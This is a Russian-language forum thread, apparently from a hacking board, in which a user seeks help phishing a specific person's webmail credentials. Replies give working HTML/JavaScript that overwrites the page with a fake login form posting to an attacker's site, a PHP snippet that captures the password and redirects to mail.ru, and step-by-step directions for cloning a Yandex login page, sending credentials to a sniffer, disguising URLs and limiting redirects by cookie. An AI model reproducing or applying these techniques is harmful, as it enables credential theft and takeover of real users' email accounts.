Мужики! нужна помощь в написании яваскрипта который заставляет выпрыгивать окошко с надписью "внутренняя ошибка браузера" и кнопочкой "ок", при нажатии на которую произойдет редирект на другую страницу. например открывает человек www.почту а ему там фотка или ссылка. он на нее тыкает и выпрыгивает окошко с "ашыпкой браузера", он "ок" и в этом же окне отображаеца клон страницы пост-сервера с требованием пройти авторизацию для получения доступа к этому ресурсу. человек вводит логин и пароль, а поскольку сраница подставная то эти данные забирает автор письма. (а они то мне страсть как нужны!!!!) да хорошо бы чтобы при "повторной авторизации" происходил редирект на настоящую страницу (где его снова попросят ввести пароль ). в итоге человек сильно устанет вводить логин и пароль и некоторое время почту проверять ваще не будет )) а мы туда войдем, и уничтожим наше письмо. как идейка? кто поможет с написанием скриптов? могу помочь с подделкой дизайна любого почтовика помогите плиз!!! а то я эти языки (php, javaskript) до старости учить буду )) _______________________________________________ всем кто поможет + (похоже на подкуп... )
Если скрипт будет написан на JS, то в исходнике будет виден весь код, в том числе и та ссылка куда перенаправляется юзер в случае нажатия ОК.. в JS используй функцию confirm. Можно написать на пхп.. ) тогда исходники никто не увидит и ничего не заподозрит)). Подобные скрипты поищи на сайте вовеб.ру =)
2 Rebz письмо будем отправлять человеку для которогу урл и нтмл даже звучат одинаково )) скрипт надо запустить из письма, то есть на клиентской стороне (пхп этого не может), спасибо за ссылку, только лично мне от нее толку мало, я в яваскрипт и пхп ваще не шарю. мне требуется ВАША помощь, то есть помогите плиз найти или написать этот скрипт. есть же здесь умные люди?! ________________________________________________ всем кто поможет + (похоже на подкуп... )
Товарищ, где это вы видили чтобы JS срабатывал в письме? (конечно, такое есть, но это всё приватно) Вот пример письма с картинкой :] Code: <html> <head> <script language="JavaScript"> var FalseDoc="тут текст страници авторизации+ наша подделанная форма<form action=\"http://нашсайт.ру/auth/\"><input type=text name=pass><input type=submit></form>"; function zapadlo() { alert('IE must die'); document.write(FalseDoc); } </script> </head> <body> <img src="photo.jpg" onClick="zapadlo();"> </body> </html> а на своём сайте делаешь php скрипт который получает пас и делает редирект уже с подставленным пасом PHP: <?php if (isset($_GET['pass'])) { //сохраняешь пас куда надо //сам редерект header('Location: http://mail.ru/auth/?pass='.$_GET['pass']); } ?>
Со стандартыми окошками браузера много не наворотишь. Если и делать так, то немного по-другому: Выводить слой, а уже на нем будет это окно (изображением). Кнопки должны будут нажиматься (onClick) и реагировать (onMouseOver). Но перед этим надо эти изображения подгрузить и уже потом выводить. А то мало-ли - чел по диалапу и увидит разметку для изображения. + надо учитывать и то, что в мире существует не тока браузер ИЕ и все сидят не тока на WinXP. А сидящие на WinXP не все юзают синее стандартное оформление винды. Т.е. опятьже - не все идеально. Можно сделать только по ИЕ-WinXP-синее оформление... Но тока зачем? Если у тебя получилось внедрить JS чтобы вывести окошко, то почему бы тебе не внедрить JS редиректа на фэйк сайт с оформлением почтовика и сообщением "Период сессии истек. Введите логин/пароль для авторизации".
2 censored! собственно этого я и хочу добиться, а истек ли там период сессии ил произошла ошибка браузера, это детали. Ты можешь написать этот скрипт? я в JS не шарю, а время идет... еще вопрос вот в чем, как подменить URL в адресной строке? чтобы без палева... по части того что JS не работает в письме: можно в письме дать ссылку на какой-то сайт (с красивой картинкой и редиректом на липовую страницу). Самое главное, чтобы все происходило в одном окне. а как этого добиться?
собственно этого я и хочу добиться, а истек ли там период сессии ил произошла ошибка браузера, это детали. Ты можешь написать этот скрипт? я в JS не шарю, а время идет... Заходишь на страничку почтовика где требуют ввести логин/пароль. Жмешь правую кнопку мышки и выбираешь "Просмотр HTML-кода". Откроется Блокнот (или что у тебя там настроено?). Жмешь сохранить и сохраняешь, например, под именем relogin.htm ... Открываешь relogin.htm и начинаешь его доделывать - дописываешь полные пути до изображений, ссылок и т.п. Доделал? Запускай его и смотри чтобы без ошибок на странице, все ссылки ввели на настоящий сайт, все изображения нормально отображались. Ну теперь и добавляй надпись - период сессии истек, требуется перезайти на сайт. Сохраняйся. Делай копию (как откат). Открывай. Запускай на странице поиск по слову form, смотри какое у него имя. Допустим - name=formsendlogin, теперь ищи поле ввода логина и смотри какое у него name, допустим - name="login", тоже самое и с паролем: name="password" Теперь ищи что-то типа такого куска <input type="submit". Допустим у тебя будет так: , тогда добавляй к нему onClick=go_go_go();, чтобы получилось: Т.е. при клике по кнопке мы и отправим и вызовим функцию. Теперь найди </form> и вставь после него такой код: Тока в строчках document.formsendlogin.login.value и document.formsendlogin.password.value замени formsendlogin, login и password на название своих полей. Вот тут внимательно прочитай: http://www.forum.antichat.ru/thread11236.html Там первый пост если на странице есть фрэймы, а чуть дальше пример если фреймов нет. Но! Там должно открываться новое окно. Чтобы в этом - зарегь себе сайт на бесплатном хостинге, и перекидывай на урл: http://www.названиесайтапочтовика.h...шь=7&session=f8b1192e4497406cdd8d8434ce0d8a97 Вообщем, просто запугай длинным урлом. Так как не все обратят внимание на %68%31%36 Ну прикинь - ты жмешь на ссылку на какой-то сайт, а тебе пишут что сессия истекла на почтовике. Надо при загрузке страницы сразу редиректить либо, как пахало на яндексе (щас - незнаю пашет или нет) - просто прилепляешь заряженое изображение с мелкими деталями, при клике по которому открывается новое (где и происходит редирект). Но при этом встраивать запись куки. Чтобы не получилось так, что его каждый раз при попытке просмотра письма будут редиректить. Вот поэтому и надо встроить запись куки. Чтобы редиректило тока один раз. Методов редиректа несколько. Смотря какую активную XSS ты юзаешь, или как используешь и куда перекидываешь. Тут надо конкретно смотреть.
2 censored! спасибо за советы, только руки у меня видимо совсем кривые... Браза, тебя если не затруднит, стукни плиз ко мне в аську... а то вопросы, но флэйм разводить неохота. 27-696-13-17
2 censored! В общем, дело в следующем. копирую хтмлкод страницы яндекса, делаю все как ты написал, но оно не работает... сам яндекс использует яваскрипт, и прописывает это в голове. пробовала засунуть твой скрипт туда, тоже не работает... не могу догнать в чем проблема. и еще не поняла, про снифер... ссылку писать на жыпеговый файл, или на лог.пхп? пробовала и так и так, на сниф ничего не приходит. --------------------------------- пардон за ламерские вапросы
Ты сначала проверь - правильно ли все вставила. Т.е. добавь onClick, но вместо этого: Поставь это: тока поменяй document.formsendlogin.password.value на своё. Если все прально - то должно вылететь окно с паролем. Если вылетело - то разбирайся со снифером. пиши на жыпеговый
хе-хе... переписала "релогин" все вроде работает, все красиво, прям яндекс настоящий. вставила алерт, вылетает, показывает введенный пароль. на снифер ничего не идет. но вишка не в этом. если в action этой формы прописать http://passport.yandex.ru/passport?mode=auth вылезает следующее: Внимание! Сайт http://support.yard.ru/relogin.html не принадлежит Яндексу. Вы видите эту страницу, потому что Вы попытались зарегистрироватся или авторизоватся на Яндексе с сайта, не имеющего к Яндексу отношения. Яндекс ничего не знает про этот сайт и не может гарантировать конфиденциальность передаваемой Вами информации (логин и пароль). Если Вы ошибочно приняли чужой сайт за принадлежащий Яндексу, рекомендуем Вам на всякий случай сменить пароль. я полагаю что придется еще написать свой обработчик этой формы на пхп, чтобы он редиректил на реальный андекс. онклик со ссылкой на снифер не работает.. алерт работает...
Хм... Надо будет попробовать несколько по другому. Как попробую - напишу о результатах. В смысле - чтобы не заморачиваться с php и заголовками. Я тебе приводил готовый пример. У меня пашет =)